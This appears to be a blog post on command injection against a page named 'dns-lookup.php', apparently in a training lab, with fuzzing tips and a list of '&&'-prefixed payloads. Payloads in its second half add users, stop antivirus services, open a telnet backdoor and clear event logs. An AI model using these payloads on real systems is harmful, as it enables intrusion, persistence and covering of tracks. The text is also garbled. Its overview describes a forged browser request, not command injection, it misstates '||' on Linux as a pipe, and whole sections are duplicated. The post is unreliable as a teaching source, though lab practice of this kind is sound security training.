Command Injection (CMDi) Overview, Discovery ,Example ,Exploitation
Overview
Command Injection may occcur when an attacker is able to run script into a users browser. To forge a legitimate request, the script creates and send the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the users browser but cannot detect that the request was created and sent by a malicious script running in the users browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.
Discovery Methodology
Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively. Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment.
Attempt to determine the operating system type.
Reserved characters used in fuzzing for command injection
&: Used to separate multiple commands on one command line. Runs the first command then the second command.
&&: Used to run the command following && only if the preceding command is successful.
|| (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| (Linux): Redirects standard output of the first command to standard input of the second command.
( ): Use to nest commands.
#: Command line comment symbol
Exploitation
Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir" but this behavior absolutely varies)
Prefix the injections with each of the reserved characters then for each prefix suffix each injection as well.
Examples
Examples for page "dns-lookup.php"
Recon: Discover available functionality
Discovery Methodology
Fuzz with command separators like ;, & and && depending on if you are using Linux or Windows respectively. Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment.
Attempt to determine the operating system type.
Reserved characters used in fuzzing for command injection
&: Used to separate multiple commands on one command line. Runs the first command then the second command.
&&: Used to run the command following && only if the preceding command is successful.
|| (Windows): Used to run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| (Linux): Redirects standard output of the first command to standard input of the second command.
( ): Use to nest commands.
#: Command line comment symbol
Exploitation
Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir" but this behavior absolutely varies)
Prefix the injections with each of the reserved characters then for each prefix suffix each injection as well.
Examples
Examples for page "dns-lookup.php"
Recon: Discover available functionality
using provided help
Windows XP: && help
Linux: && <cmd> --help
Linux: && man <cmd>
Recon: Determine current directory
Windows XP: && dir
Linux: && pwd
Recon: Chain commands to discover driectory structure
Windows XP: && cd ../../.. && dir
Linux: && cd ../../.. && ls -l
Scanning: Get machine network settings, hostname,
DNS servers, subnet mask, etc.
Windows XP: && ipconfig /all
Linux: && ifconfig
Scanning: Discover hosts on network
Windows XP: && ping -n 1 192.168.56.102
Linux: && ping -c 1 192.168.56.102
Scanning: Enumerate Current user
Windows XP: && set
Linux: && whoami
Scanning: Enumerate computers, users, groups,
AD computers, AD users, AD groups
Windows XP: && net view [/domain]
Windows XP: && net user [/domain]
Windows XP: && net localgroup [/domain]
Gaining Access: Add user
Windows XP: && net user <username> /add
Linux: useradd <username>
Gaining Access: Delete user
Windows XP: && net user <username> /delete
Maintain Access: kill AV
net stop <av process>
Maintain Access: Kill AV/protective services or
open backdoor services
Windows XP: && net stop <service name>
Windows XP: && net start telnet
Windows XP: && net stop telnet
Cover Tracks: Clear logs
Windows XP: && wevtutil cl
Comments
Post a Comment